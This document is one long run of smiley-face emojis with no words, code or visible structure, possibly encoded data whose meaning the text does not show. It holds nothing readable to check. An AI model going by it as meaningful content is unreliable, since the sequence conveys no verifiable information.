😅😄🙂😁😂😀😜😜🙂🤪😄😜😉😇😁😊🤪😝😅🙃😃😂😂🙂😀🤣🙃😅😁🤣😊😁😆😄😜😅🤣😀🤣😇😂😜😀😝🙃😇😄😊😊😉😆🙃😜🙃🤣😂😃😉🙂😅😃🤣😉😁😆😆😇😃😅😀😀😃🤣🤪🤣😆🙂😇😃😊😉😉😆😊😇🙂😅😂😀🙃😂😅🙂🙂🙃😆😄😄😊😃😅😄😃😂😅🤪😃😃😂😇😜😀🙃😊😄🙃😊🙂😆😝😄😄🤣😅😃🙃🙂😁😃😊😉😃😁😃😊😜😆😜😝😝🤣😇🙃🙂🙂😉😃🙃😉🙂😆😂😇🤣😅😅🤪😆😂😁🤪🙃🙃😃😁😜😉😜🤣😁😇😝😅😝🤪😊🙂😇😀🙃🙃🙂😆🙂😊🤣😇🙂😝😆🤣😁😜😄🙂😃😃😀🙃😜😆😝😊😝😅😉😝😊🙂😊😜🙃🙃😉😃😂😉🤣😅🤣😇😆🤪🙃🤪😁😂😃😀😀😉😃😃🤪😉😝😅🤪😇😊🙃😇🤪🙃😂🙂😀😂😉🙂😄😅😊😆🤣🤣😝😄😁😜😜😀😂😜😀🤪😉😜😄😇😊😊🤣🤪😝🙃😊😄😜😂🙂🤣😃😅😉😆😁😁😇😄😂😄🤪😀🙃😁😜🤪🙂😜😃😇😊😝😁😉😇🙃😂😉🤪😂😝😝😀😅🙃😆😄😁😇😆😆😃😝😀🙂😄🤪🤪😀😃😀😝🙃😊😄😉😇😊🙃😀😝😂🙂😉😜😅🤣🙃😃😆😉😄😁😃😇🤣🙃😊😝🤪🙃😄😜😇😉😂😃😉😉😉😁🙂😇🙂😅🤣🤪😅😃😃😀😁🙃😄😄😃😇😀😁😜😇🤪😅😝🤪😇😄🤣😀😉😊🙂😄🙂😝😇😆🤣😝🤣🤣😆😀😅🙂😄😃😃😇😃😄😜😅😝😆😝😝😇🤣😊😜😉🙂🙃😃🙂😇🤣😁🤣😝😁😅😆😀😆😂😄😃😁🙃😀😃😜😇😜😁😝🤣😄😅😇🤪😉😂🙃😃😉🙃😂😄🤣😝😂😆😆😜🙃🤣😆😜😃🙂😀😄😃🙃🤪😄😝😝😜😆😊😁😉🤣🙃😜🙂🙂😂😄🙂😉😅😁😆🤪😂😅😄😇😅😂😃😜😜🙂🤪😃😝😉😇😁😊🤪😊😅🙃😀😇😂😂😀🙂🙃😅😄😆😊😁😆😄😜😁🤣😀🤪😜😂🤪😀😝🙃😇😁😃😀🤣😆🙃😜😊🤣😂😜😉🙂😅😃😅😉😁😁😆😇😃😅😀😂😇🤣🤪😜😝🙂😇😄🤪😉😉😁🙃😇🙂😅😂🙂😁😂😅😀😆🙃😁😁😄😊😃😆😀😇😜😅🤪😝😂😂😇😄😉🙃😉😆😇😊🙂😆🙂😝🤣😂😂😜😆🙂😁😁😁😉😃🤣🙃😇😀😆🤪😝😝🤣😇😜😊🙂😉😁🙂😉🙂😆😅😇🤣😂🤣🤪😆🙂😅😀😄🙃😃😆😃😉😜😆🙂😇😝😅😇🤪😊😂😉😀🙃🙃🙂😆🤣😊🤣🤣🤣😝😆🤣😆😜😄🙃😁😃😀🙃😜😆😜😊😝🙂😀😝😊🤣😉😜🙃🙂🙂😃😂😉🤣😅😆😇😆🤣😃🤪😄🙃😄😀😀😉😃😃🤪😉😝😅😝😇😊😜😀🤪😉😂🙂😀😂😉🙂😄😅😊😆🤣😅😝😄😄🙂😜😀😂😜😀🤪😉😜😄😇😊😊🤣😝😝🙃😇😃😜🙂🙂🤣😃😅😊🤣😂😊😇😄😂😅🤪😀😃🙂😜😜🙂😝😃😇😉😊😀😂😇🙃😂🙃🤪😂🙃😉😀😅🙃🤣😄😁😊😆🤣😁😝😀🙂😃🤪🤪🙂😆😀😇🙃😊😄😉😊🙃😇😜😝😂🙂😅😜😅😉🤣😃😁😉😁😁😃😝😄😆😜😝🤪🙂🤪😜😇😊😜😃😉😉🙃😁🙂😇😂😅🤣🤪😅🙃😁😀😁😉😀😄😃😝😃😁😜🤪😀😅😝🤪😇🙃😇😀😉😄😜😄🙃😊😂😆🤣🤪😂🤣😆😜😁😉😆😃😃😄🤪😄😜😊🤪😆😝🤪🤪🤣😊😜😉😉😇😃🙂😆🤣😁😂😇😅😅😆😜😅😂😄😀😃😊😆😃😜🙂😁😁😝😇😇😅😊🤪😉😂🙃😀🙂😊🙂😄🤣😝🙃😆😆😝😅🤣😄😜😁😉😄😀😜😇😀😄😝😝🤣😆😊😝😉🤣🙃😜🙂😁😄😃🤣😇😆😁😆🤪😅😅😄🤪😄😂😀😃😃🙂🤪😃😝😇😝😁😊🤣🙃😅🙃🤪🙂😂😂😀🤣🙃😅😄😆😝😄😆😄😝😜🤣😀😃😀😂🤪😃😜🙃😇😄😊😝😊😆🙃🤣🤪🤣🙂😜🤣🙂😅😄🤣😉😁😁😄🤪😁😅😀😝😃🤣🤪😜😝🙂😇😄😝😉😉😁🙃🤪😊😅😂🙃😉😂😅😀😆🙃😁😁😆😊😃😆😀😜😁😅🤪🤣😉😂😝😀😊🙃😉😄🙃😊🙂😆😂😜😂🤣😅😃🙂🙂😁😃😆😉😃😁😀😊😜😆🤪😜😜🤣😇😜😊🙂😉😃🙃😉🙂😁😝😃😄😅😅😀😂😂😁😄🙂🙃😃😄😃😉😜😁😜😇😝😅😇🙂🙂😂😉😀🙃🙃🙂😁😂😊🤣😆😅😝😆🤣😁🙃😝🙂😃😄😜🙃😜😅😃😊😝😆😝😝😊😂😇😜🙃🙂🙂😁🙂😉🤣😝😆😇😆😅😁🤪😄😂😃😀😀🙂😜😁😝😉😝😆😉😇😊😂😊🤪🙃🙂😉😀😂🙃🤣😆🤣😊😆😝🙃😝😁🤣😃😜😀🙃😃😀🤪🙃😝😆🤪😊😊🙂🙂😝🙃🤣🙂😜😂🙃🙂😃😅😉😆😅🤣😇😄😆🤣🤪😃🤣😜😜🤪🙃😜😃😇😉😊😅🤪😇🙃😝😁🤪🙂😂🤣😀😅🙃😆😄😁😊😄🤣😄😝😀🙂😁🤪🤪😂😜😀😇🙃😊😄😉😊🙃🤣😉😝😂🤣🤣😜😅🙂😆😃😁😉🙂😂😝😇😀😂😄😝🤪😂😄😜😇🙂😇😃😉😉😉😁🙂😇😂😜😁🤪😅😂😆😀😁😉😄😄😃😊😀😁😜😇🤪😀🙂🤪😇🙃😉😀😉😊😇😄🙂😊🙂😆🤣🤪😂🤣😆😜😁😉😁😃😃😁😜😄😜😊🤪😆😝😝😇🤣😊😜😉😉🙂😃🙂😊😅😁🤣🤪🤣😅😆😜😅😂😄😀😃😊😃😃😜😆😆😁🤪😇😇😅😊😜😇😂🙃😀🙂😊🙃😄🤣😜😆😆😆😝😁🤣😄😀😁🙂😀😀😜😇😃😄😝😀😆😆😝😝😉🤣🙃😀😉🙂😂😃🤣😇🙃😁😆😜😇😅😆🤪😃😂😀😜😜🙂🤪😃😝😇😝😁😊🤪🤪😅🙃🤪😉😂😂😀🤣🙃😅😄😆😝😅😆😄😝😃🤣😀🤪😜😂🤪😃😁🤪🙂😄😊😝😝😆🙃🤪😄🤣😂😜😂🙂😅😃😅😉😁😁😄😅🤪😅😀😝😜🤣🤪😀😝🙂😇😃😊😉😉😁🙃😆😊😅😂😀😅😂😅😄😂🙃😁😄😁😊😃😅😄😇😜😅🤪😀🤪😂😇😆😆🙃😊😄🙃😊🙂😆😂😝🤣🤣😅😃😁🙂😁😄😀😉😃😅😃😊😜🤣😀😝😝🤣😇😃😇🙂😉😉😜😉🙃😁😂😇🤣🤣😂🤪😆😂😁😄😆🙃😃😝🤪😉😜😁🤪😇😝🤣🤪🤪😊😂😉😄😇🙃🙂😁🤣😊🙂😆😅😝😆😂😅😜😄🙂😃😁😆🙃😜🙃😁😊🤪😆😇😝😊🤣😉😜🙃🙂🙂😁🙂😉🤣😅🙃😇😆😅😅🤪😄😂😃😀😀🙂😜😁😝😉😝😅😝😇😊😅😊🤪🙃🙂😉😀😂🙃🤣😆🤣😊😆🙃🤣😝😄🤣😃😜😀😂😜😀🤪🙃😝😆😊😊😊😅🙂😝🙃🙂🙃😜😂🙃🙂😃😅😉😆😅😆😇😄🤪😂🤪😃🤣😜😜🤪🙃😜😃😇😉😊😅😇😇🙃😊😇🤪🙃😂🤣😀😅😉🤣😄😁😊😄🤣😆😝😀😃😇🤪🤪😂😝😀😇😉😝😄😉😊🙃🤣😇😝😂😁😊😜😅🙂😆😃😁😉😄😁😃😇😀😂😀😝🤪🙃😃😜😇🙂😝😃😉😉🙃😁🙂😇😂😂🙂🤪😅🙂😝😀😁🙃😄😄😃😇😄😁😜😇🤪🙂😀🤪😇😃😃😀😊🙃🙃😄🙂😇🙃😆🤣😝😅🙂🙂😜😁😜😂😃😄😉😀😄😜😝😀😆😝😝😇🙃😀😜😉😉😄😃😉😉😂😁🤣😝😂😅😆🤪😁🙃🙂😀😃😄😂😄😀😉🤪😁😝😇😇😅😊🤪😉🙃😇😀🙂😊😝😄🤣😊😂😆😆🤪😅🤣😄😜😃😉😆😀😜😁😆😄🤪😊😇😆😊🤪😇🤣🙃😜🙂😉😇😃🤣😜😝😁🤣😇😁😅😄😜😁😂😀😜😜😊😆😃😝😆🙃😁😇😇😉😅🙃😜😉😂😂😀🤣😊😇😄😆😝😇😆😁😝😃🤣😀🤪😜😂🤪😀😝😇😀😄😊🤪😃😆🙃😝😉🤣😂😀🙂🙂😅😃😆😇🙂😁😄😅😂😅😃😝😜🤣🤪😀😜🙂😇😃😊😝😀😁🙃🤣😇😅🙂🤪🤣😂😅😃🤣🙃😁😄😄😝🙂😆😀🤣😜😅🤪🤪😝😂😇😃😝🙃😉😄🙃🤪😀😆😂😅😃🤣🤣😜😆🙂😁😃😄😉😃😁😀🤪😆😆🤪😀😅🤣😇😜😝🙂😉😄😊😉🙂😁😂🤪😇😅😅😂😉😂😆😀😄🙃😃😁😄😉😜😁🤪😜😆😅😇😄😃😂😊😀🙃🙃🙂😁🙃😊🤣😆😅😜😇🤣😁😝🙂🙂😄😃😀🙃😜😆😀😊😝😆😇😀😆🤣😉🤣😃🙂🙃😃😂😉🤣😁😅😇😆😅😁😀🙂😂😃😄🙃🙂😜😄😀😉😝😆🤪😇😊😅😉😃😀😂🙂🙃😝🙃😂😄😅😊😆😅😅😝😄🤣😃😃🙂😂😜🙃😂🙃😝😄😇😊😊😅😇😝🙃🤣🙂😄😀🙂🤣😅😃😉😆😁😁😇😄🤣😁🤪😀🤣😜😄🙂🙂😝😀😆😉😇😁😉😇🙃😅🙂🤪😂😂🤣😄😇🙃😆😆😝😊😄😆😁😝😀😂😃🤪🤪😂😝😁😆🙃😊😇😀😊😉😆🙂😝😂😂🙂😜😅🙂😆😁😇😉😄😂😇😇😄😆😜😝🤪😂😜😜😇🙂😊😆😆😉🙃😊😇😇😂😅🤣🤪😅🙂🤣😀😁🙃😄😆😇😊😀🙂😇😇🤪😅😝🤪😇😂😊😀😉🙃🙃😅😀😊😂😂😃😝😅🤣🤣😜😁🙃😆😃😃😉😀😅🙂😊🤪🤪😁😝😝🤣😊😜😉🙃😊😃🙂😉😂🤣😀😇😅😃😀🤪😁😂😄😀😃😉😄😃😜😉🤪🤣🙂😇😇😉😉🤪😉😂🙃😀🙂😉🙃😄🤣😊😅😂😀😝😁😆🤪😜😄🙂😀😀😜🙃🤪😄😝😊😇😂😆😝😉🙃😅😜🙂🙂🙃😃🤣😊😂😁😆😇😁😂😇🤪😃😀🤣😀😀🙂🤪😃😝😊🤪😁😊😇😉🙂😆🤪🙂🙂🤪😀🤣🙃😅😄😆😇😅😆😄😝😃🙂😇🤪😜😃😀😀😝🙃😇😄😊😇😇😆🙃😝🙂🙃😆😜🤣😜🤣😃😅😉😁😁😄😇😃😅😀😝😜🙃🙂😜😝😊🙃😃😊😉😇😁🙃😝😉😅😂🤪🤣😉😀😀😆😄🙃😄😁😊😃😆😀🤪😃😅🤪🤪😝😉🙂😀😊😉😉😄😊😊🙂😆😂🤪🙂🤣😅😜😆😊😀😃😄🤣😀😁😃😊😜😆🤪🤪😜🤣😇😜😊😊🙂😃🙃😆😝😁🙂😇🤣😅😅🤪😆😂😁😀😄😊😇😄😀😝😝😁🤪😇😜😅😇😜😝😂😉😀🙃😇😆😄😂😆😇😆🤣😝😆🤣😁😀😆🙂😃😃😀😇😇😄🤪😁😜😆😇😝😊🤣😉😀😊🙂🙂😃😂😝😆😁😅😃😁😅😅🤪😄😂😃😃😄🙂😜😃🤪😝😇😁😇😂😆😅😊🤪🙃😂🙂😀😂🙃🤣😄😅🤪😀😆😁😀😃🤣😃😜😄😂😜😄😀🙃😝😄😇🤪🙂😆😉🤣😜🤣🙃😜😂🙂🤣😄😂😉😆😁😁😜😀😅😃😃🤪😂😀😜🤪🙂😝😄🤪😉😊😁😉😜🙂😅🙂😅😅😂🤣😀😅🙃😆😁😅😊😄😆😃😀😀😅😜😃😅😂😝😀😇🙃😊😄😉😊🙃😆🙂😀😆🤣🤣😄😅🙂😆😃😅😉😄😆😁😇😀😆😜😀😇🤣😝🙃😄🙂😇😃😉😉🙃😆😉😇😂😅🤣😃😆😂😆😁😜🙃😁😄😃😊😀😅😃😇🤪😅😝😃😇😂😊😀🤣🙃😉😄🙂😊😂😅🙂😝😅🤣😆😄😆🙂😄😊😉😉😃😄😜😊🤪😆😝😝😇🤣😊😄🙂🙂🙃😆🙃😉😂😁🙂😇😅🤣🤣🤪😁😂😄😁😀🙃😀😊😅😉😜😁😝😇😇🤣😝🤪😉😂🙃😁🙂🙃😂😜😃😊😅😆😆😝😁😂😆😜😃🙂😀😆😀🙃🤪😇😁😊😇😆😊😝😉😂😊😆😀🙂😂😆🙂😉😅😉😜😇😆😅😄🤪😃😂😀😃😊🙂🤪😆😇😉😇🤣😝😇😉😅😊🤪🙂🙂🙃😀🤣🙃😅😅😆😊😁😝🙂😝😄🤣😀🤪😜🙃😀😀😝🙃😇😅😇😊😉😂😂😝😉🤣😂😜🤣🙃😂😃😆😉😁🤣😆😇😃🤣😆🤪😀🤣🤪😜😝🙃🤪😃😊😉😉🤣😇😇🙂🙂🤪🤪😂😂😅😀😆🙃😁😄😄😊😃😂😀😇😜🙃😃🤪😝😂🤪😀😊😉😇😄🙃😊🙂😂🙂😝🤣😜😊😜😅🙂😁😃😄😊😁😁😀😊😜🙂😀😝😝😁😜😜😇🙂😉😃🙃😊😉😁😂😇🤣🙂🙂🤪😆🙂😁😀😁🙃😃😄😀😇😃😁🤪😇😝🙃😀🤪😊😀😁😀😉🙃🙂😄😂😊🤣😆😅😝😆🙃😆😜😄😊😅😃😀😉😃😄🤪😇😜😆😇😝😊🙃😇😜🙃😃🤪😃🙂😉🤣😁😅😝🤣😅😁🤪😄😉😆😀😀😂😇😃😜😉😝😁😇😝😝😅😉🤪🙃😉😇😀😂😁😀😄😅😊😆😆😁🤪😆🤣😃😜😀😊😆😀🤪🙂😅😄😝😊😊😆😉😝🙃🤣🙂😜😂😊🙂😃😅😝🙃😁😁😇😆😅😃😜😄🤣😜😜🤪😇😀😃😇😆😃😁😊😇🙃😅🙂😜🙃😂🤣😀😅😇🙂😄😁😃🤪😆😃😝😀😅😜😀😀😂😝😀😇😝😀😄😉🙂😂😆🙂😝😂🤣🤣😀😂🙂😆😃😁😝🙂😁😃😜🙂😆😜😝🤪🤣😝😜😇🙂😊😃😉😝😇😁🙂😜😝😅🤣🤪😂😂😆😃😅🙃😄😄😃🤪😆😁😜🤣😆😅🤪🤪😇😂😊😃😇🙃🙃😄🙂🤪😇😆🤣😆😂🤣😆😜😁🙂😄😄😁😉😀😄😜😜😆😆😝😝😃🤣😊😜😉🙂🙃😄😉😉😂😁🤣😜😇😅😆🤪😉😂😁😀😃🙃😀😃😜😉🤪😁😝😀😀😅😊😄😃😂🙃😀😉🙃😂😁🙂😊😅😆😆😀🙂🤣😄🙂😂🙂😃😀😜🙃🤪😁😜😊😇😆😊😃😀🤣🙃😂😉🙂🙂😃🤣😉😅😆🤣😇😁😅😄😃🙂😂😀😜😀🙂😜😃😝😉😇😆😝😇😉😅🙃😄😀😂😂😜😄🙃🤣😄😆😊😁😆😄😝😃🤣😀😄😆😂🤪😆😅🙃😇😄😝😊😉😅😊😝🙂🤣😂😄😇🙂😅😉😉😉😆😁😄😇😃🤣😄😝😜🤣🤪😁😆🙂😇😂🙃😉😊😁🙃😇🙂🤣🙃🤪🤣😂😅😁😇🙃😁😝😇😊😄😆😀😇😜😂😀🤪😝😂😇😆😆🙃😉😜🤪😊🙃😆😂😝🤣🤣😅😜😆🙂😁😆🙂😉😃🤣🙃😊😜😅😀😝😝😂🤪😜😊🙂😉😅😀😉🙂😇😝😇😂😅😅🤪😆🙂😅😀😄🙃😃😅🙂😉😜🙂😅😇🤪😅😇🤪😊🙂😇😀🙃🙃🙂🤣😀😊🤣🙃🤣😝🤣🤣😁😜😄🙃😁😃😀🙃😜🤣🙂😊😝😊😂😝😇🤣😉😜🙃🙂🙂😃😂😉🤣🤣😇😇😆🙂😝🤪😄😂😁😀😀😉😃😃🤪😉😝😂😆😇😊😜😀🤪😉😂🙂😀😂😉🙂😄😅😊😆😂😇😝😄😀😜😜😀😂😜😀🤪😉😜😄😇😊😊🙂😆😝🙃😆😀😜😂🙂🤣😃😅😊🤣😁😁😇😄🙂😇🤪😀😃🤣😜😜🙂😝😃😇😉😊😁😉😇🙃🙃😀🤪😂😊😃😀😅🙃🤣😄😁😇😆😆😃😝😀🙃🙂🤪🤪😃😁😀😝🙃😊😄😉😇😊😆🙂😝😂😉😀😜😅😄🙂😃😁😉😄😁😃😝😄😆😜😝🤪😉🙂😜😇😊🤣😃😇😉🙃😁🙂😝🙃😅🤣🤪😅😊😀😀😁😂🤣😄😄😊😀😁😜😇🤪😅😝🤪😇😊😆😀😉😝😅😄🙂😊🙃😆🤣🤪😂🤣😆😜😁😊😇😃😃😁🤣😁😀😊🤪😆😝🤪🤪🤣😊😜😉😇😆😃🙂😃🤣😁😂😇😅😅😆😜😅😂😄😀😃😇😇😃😜😃😊😁🤪😇😇😅😊😜😇😂🙃😀🙂😝😆😄🤣😃😄😆😆😝😁🤣😄😜😃🙂😀😀😜😝🙂😄😝😜🙃😆😊😝😇🤣🙃😀😉🙂😂😃🤣🤪😀😁😆😅🙃😅😁🤪😃😂😀😃😃🙂🤪😃😝🤪🙂😁😊😉🤣😅😉🤪🙂😂😂😃🙂🙃😅😄😆😜😀😆😄🙃😆🤣😀🤪😜😂🤪😃😜🙃😇😄😊😜🙂😆🙃😜😀🤣😂😜🤣🙂😅😃😆😉😁😁😄😜😇😅😀😃😝🤣🤪😜😜🙂😇😄😝😉😉😁🙃😀😆😅😂😂😇😂🤣😀😆🙃😁😁😆😊😃😆😀😀😇😅🤪🤣🤣😂😇😀😊🙃😉😁😊😊🙂😆😂😃😆🤣😅😄😜🙂😁😃😄😉😃😆😄😊😜😆🤪😃😇🤣😇😁😁🙂😉😃🙃😉🙂😁😂😇🤣😅😅😄😀😂😁😆😃🙃😃😄😄😉😜😅😀😇😝😅😇😄🙂😂😉🙃😜🙃🙃😄😂😊🤣😅😂😝😆🤣😁😁😀🙂😃🤣😄🙃😜😄🤪😊😝😅🤪😝😊🤣😉😁🙂🙂🙂😜🙃😉😂😁😅😇😆🤣😅🤪😄😂😃😆😀🙂😜😊😀😉🤪😁😇😇😊😅😉🤪🙃😂🙂😆😆🙃🤣🤣😅😊😆😆😅😝😄😂😁😜😀😂😜😆😇🙃😝😇😄😊😇😆😉😝🙃😂😉😜😂🙂🤣😅😆😉😆🙂😁😇😁😅😃🤪😀🙂😃😜🤪🙂😝😅😇😉😊🙃🙃😇🙃😅🙂🤪😂🙂🙂😀😅🙃😆🤣😆😊😄😝😄😝😀😅😜🤪🤪😂😝😀😇🙃😊🤣🙂😊🙃🙂🙃😝😂🤣🙂😜😅🙃🤣😃😁😉😄😂😀😇😀🤪😅😝😜🤣😝😜😇🙃😝😃😉😉🙃😂🙂😇😂🙂😜🤪😅😂😆😀😁😉😆😄😃😊😀🙂😀😇🤪😆🙂🤪😝😂😊😀😉😉😊😄🙂😊😂🙂🙂😝😅😆😇😜😆🙂😄😃😃😉😀😀😜😊🤪🙂😇😝😇😉😝😜😉🙂😊😃🙂😊🙃😁🤣😇😅🙃😆🤪😁😀🙂😀😄🙃😀😃😜😇😀😁😝😇😇🙃😇🤪😉😂😀😀🙂🙃😂😄🤣😇😂😆😆😝😁😉😆😜😃😄😜😀😜🙃🤪😄😝😇🤪😆😊😝😉😉😇😜🙂😝😂😃🙂😉😅😁😆😇😁😅😄🤪😃😊😀😜😜😝😃😃😝😉🤪😁😊😝😇😅🙃🤪🙂😊🙂😀🤣😄😊😄😅😊😁😆😄🤪😁🤣😀🤪😜😇😀😀😝😊😄😄😇😊😉😆🙃🤪😉🤣😂😜🤣😇🙂😃😆🤣😁😁😄😇😃😅😀😜😃🤣🤪😜😝😝😀😃😊😃😅😁😉😇🙂😅😂🤪🤣😅😅😀😆😝😆😄😄😜😅😆😀😝😃😅🤪😜😜😂😇😀😊😝😇😄🙃😆🤪😆🙂😝🤣🤣😅😀🤣🙂😁😃😄🤪😆😁😀🤪😇😅😀😝😝🤣😇😀😝🙂😉😃🙃🤪😇😁😂🙃😂😅😅🤪😆😂😁😃😆🙃😃😄😀😜😆😁🤪😇😊😅😝🤪😊😂😉😀🙃🙃🙂😄😂😜🙂😆😅😃🙃🤣😁😜😆🙂😃😄😄🙃😜😄🤪😀😀😆😇😂😃🤣😊😜🙃🙂🙂😄🙃😉🤣😁😅😀🙂😅😁🤣😃😂😄😀😀🙂😜😁😀😉😝😁😇😃😀😅😉😆😀😂😉😀😂🙃🤣😁😂😊😆😆😁😃🙂🤣😃😁🤪🙂😀😀🤪🙃😝😄😇🙃😊😆😉😃😇🤣🙂😁😝🙂🤣😃😂😉😆😆😅😇😄😅😃😄😆🤣😜🙃😆🙂🤪😃😇😉😊😆😇😇🙃😅🙂😄😇😂🤣🤪😜🙃😆😄😁😊😄😅😁😝😀😅😜😁😆😂😝😜😂🙃😊😄😉😊🙃😅😉😝😂🤣🤣😁😇🙂😆😁😉😉😄😁😃😇😀😆😜😝🤪🤣😝😆😀🙂😊🤣😃😉🙃😁😉😇😂🤣🙂🤪😅😂😆😆🙂🙃😄😊😂😊😃😁😜😇🤪🤣😜🤪😇😂😊😅😀🙃🙃😝😁😊😂😆🤣😝😅😂🤣😜😁🙂😄😅🙂😉😀🙂😀😊🤪😆😝😝😇😂😝😜😉🙂🙃🤣😀😉😂😁😊😇🤣😅😆🤪😁😂😄😇🤪🙃😀🤣😆😉🤪🙂😅😇😇😅😝🤪😉🙂😊😝🙂🙃😂🤣😇😊😅😝😉😝😆🤣😄😜😃🙃😄😅😂🙃🤪😂😆😊😇😊🙂😝😉🤣🙃😜🙂🙃🙃😅🤪😉😅😂😇😇😁🙃🤣🤪😁😂😀😜😜😉😀🤣😅😉😇🙂😆😇😉😝😂🤪🙃😂😂😀🤣🙃😅😜😃😊😁🙂🙂😝😃😉🙃🤪😜🙂😀😀😝🙃😇😇😊😊😉🤣😊😝🙂😉😝😜🤣🙂🤣😃😆😉🙃😂🤪😇😃😂😁😝😜🙂😊😜😝🙂😝😃😊😉😇😁🙃😇🙂😜😆🤪🤣😂😅😀😆😉😜😄😄😊😃😆😀😇😜😜😊🤪😝😂😇😀😊😉😊😄🙃😊🙂😆😂😝🤣😄😂😜😆😉😄😃😄😇😆😁😀😇😀😆🤪😝😝😀😆😜😊🙂😉😃🙃😉🙃😁😂😇🤣😅😅😀😊😂😁😀😄🙃😃😄😝😉😜😁🤪😇😝😅😜😜😃😂😉😀🙃🙃🙂🤣🙂😃🙃😊🙃😁😝😝😄🤣😀😆🙂😃🤣🙃😜😄🤪😊😝🤣😂😜😊🤣🙂😊🤣😉😉😄🤣😁😊😁😅😇😆😅😁🤪😄😂😃😀😀😂😜😅😝😉😆😁😇😇😊😅😉🤪🙃😂🙂😇😂🤪😊🤣😅😊😂😆😂😝😄🤣😃😜😀🤪🤣🤣😜😀😉🙃😃😅😃😅😀😝🙃🤣🙂😜😂😝😅😁😄🤣🙃😂😇😝😉😃😃😂🤣😂😅😜🤪🙂😝😃😇😜😀😊😀😄🤪😇🤣😅😊🤪🙃😀🙂🙃🤪😄😁😊😄😆😃😃😂😇😆🤣😄😝😀😂😃😀😝😉😀😄😄😉😊😁😇😜😇😜😝🙂😆😃😁😉😄😂🙃😄😁😉😃😄🙂😊🤣😅😅🤪😁🤣😅😉😃😁😇😇😂😅🤣🤪😅🤪😊🤣😆😜😊🙃😅😆🤣😆😅😇🤪😅😝🤪😇😜😀😂🙂😀🙃🙂🙃😃😉😊😃🤣😊😂😅😜😁🙂😄😃😃😜😄🙃😆😄🤪😊🙃😆😅😇🤪😅😊😜😝😂😝😀😊🙂🙃😁🙃😇😁😅😅😝😁🤣🙂😜😅😄😄😊🙂😁😝😇😇😅😊😁😀🤪😄😂😉😜😇😂🙃😃😉😊🤣😆🙃😇😂🤣😁🙃🙃😀😜🙃🤪😄😝😇😄😂🙂😝😉🤣🙃😜🙂🙂😉😃🤣😉🤣😁😆😇😆😅😄🤪😅🙂😄😜😜🙂🤪😃😝😉😜😁😊😇😊😅🙃🤪😇🙂🙃😀🤣🙃😅😄😆😇😊😆😄😝😄🤣😀😀😃😆🤪😀😝🙃😝😄😊😇😆😆🙃😝🙂🤣😂😜🤣😃😊😃😆😉😆😁😄😇😄😅😀🤪😀🤣🤪😜😝🙂😇😃😊😉😊😁🙃😇🙂😅😂🤪😂😂😅😃🤣🙃😁😄😄😊😁😆😀😝🙂😅🤪🤪😝😂😇😃😝🙃😉😄🙃😊😊😆😂😝😇🤣😅😜😆🙂😁😄😆😉😃😁😀😇😁😆🤪😝😜🤣😇😜😊🙂😉😄😊😉🙂😁😂😇😊😅😅🤪🙂😂😁😀😄🙃😃😄😀😉😜😁🤪😇😜😅😇😜😀😂😉😀😊🙃🙂😁😂😊🤣😆😅😝😅🤣😁😜😅🙂😃😃😄🙃😜😆😀😊😝😆😇😝😝🤣😉😜🤪🙂🙂😃😂😉🤣😅😅😇😆😅😁🤪😆😂😃😀😄🙂😜😄🤣😉😝😆🤪😇😊😅😉🤪😝😂🙂😃😁🙃🤣😄😅😊😆😆😁😝😄🤣😃😜😄😂😜😃😄🙃😝😄🤪😊😊🤣😉😝🙃🤣🙂😜🙃🙂🤣😃😂😉😆😁😉😇😄😂😃🤪😀🤣😜😀😀🙂😝😃🤪😉😊😁😊😇🙃😂🙂🤪😂😂🤣😀😂🙃😆😄😅😊😄😆🤪😝😀😂😃🤪🤪😂😝😃😀🙃😊😁😅😊🙃😆🙂😝😂🤣🤣😜😅🙂😆😃🙂😉😄😁😄😇😀😆😜😝🤪🤣😝😜😇🙂😊😃🤪😉🙃😁😝😇😂😅🤣🤪😅😂😆😀😁🙃😄😄😁😊😀😁😜😇🤪😅🤪🤪😇😂😜😀😉🙃🙃😄🙂😊😂😆🤣😝😅🤣😅😜😁🙂😄😉🙃😉😀😄😜😊🤪😆🤪😝😇🤣😊😜😉🙂🙃😃🙂😉😂😁🤣😇🤣😅😇🤪😁😂😄😀😃😅😂😄😁😉🤪😁😝😇😇😊😝🤣😁🤪😝🤣😝😅😝😄🤣😊😅😆😆😝😁🤣😄😜😃😂😀😆🤪😉😃😄😝😊😇😆😊😝😉😁😀😀😆🙂😂😃🤣😉😅😂😉😃😊😇😅😁😊😊😝😅😄🤪😂🙂😝😄😆🙃😆😃😂😉🙂🤪😊😂😉😀🤣🙃😅😄😆😄🤣😊😂😁😁😅😂🤪😜😂🤪😀😝🙃😇😄😊😊😉😊🙃😃🙂😄🤪😜😉🙂😅😃😆😉😁🙃😅😄🙃😊😃😅😃😀😆😀😁🙂😇😃😊😉😉😉😇😁😇😇🙃😆😜🤪😁🤣😊😊😆😄😄😊😃😆😀🤪😃😄🤪🤪😝😂😜😀😊🙃🤪😄🙃😊🙂😆😂😝🤣😝😆😜😆🙂🤣😃😄😉😆😁😀😇😀😆🤪🤪😁😁😁😜😊🙂😝😃🙃😉😜😁😂😇😂😅😅🤪😆😂😁😀🤣😉😁😄😀😉😜😁🤪😝😆😅😇🤪😇😂😉😃😊🤣🙂😄😂😊🙃😆😅😝🙂🤣😁😜😄🙂😃😃😀😀🤪😄🤪😇😀😆😇😝🤪🤣😉😜😉🙂🙂😃😂😊😂😁😅😇😂😅😁🤪😆😂😃😀😀🙂😜😁😀😜😅😁😇😇🤪😅😉🤪😊😂🙂😀😂🙃🤣😁😂😁😆😆😁😝🤣🤣😃😜😁😂😜😀🤪🙃😝😁🤪😊😊😆😉😝🤪🤣🙂😜🙃🙂🤣😃😅😉😆😁😁😇😄😅😃🤪🤣🤣😜😜🤪🙂😝😃😇😉😊😆😇😇🙃😅🙂🤪🤪😂🤣😀😂🙃😆😄😁😊😄😆😅😝😀😅😜😜😁😂😝😄🙃🙃😊😄😊😊🙃😆🙂😄😂🤣🤣😜🤪🙂😆😃😂😉😄😁😃😇😀🤣😃😆😀🤣😝😀🤣🙂😊😄😄😉🙃😁🙂😇😂😂🤣🤪😅😂😆😀😝🙃😄😄😊😊😀😆🤣😇🤪😂😝🤪😇😂😊😃😅🙃🙃😄🙂😊😂😆😊😝😅🤣😆😜😁🙂😄😃🤪😉😀😁😂😊🤪😆😝😝😇🤣😊😜😉🙂🙃😄🤣😉😂😁🤪😇😅😅😆🤪😁😂😄😀😃🙃😀😄😉😉🤪😆😊😇😇😅😝🤪😉🙃🙃😀🙂🙃😂😁😃😊😅😆😜😝😁🤣😁😜😃🙂😀😀😜🙃🤪😁🙂😊😇😆😝😝😉🤣😊😜🙂🙂😂😃🤣😉😅😁😜😇😁😅😝🤪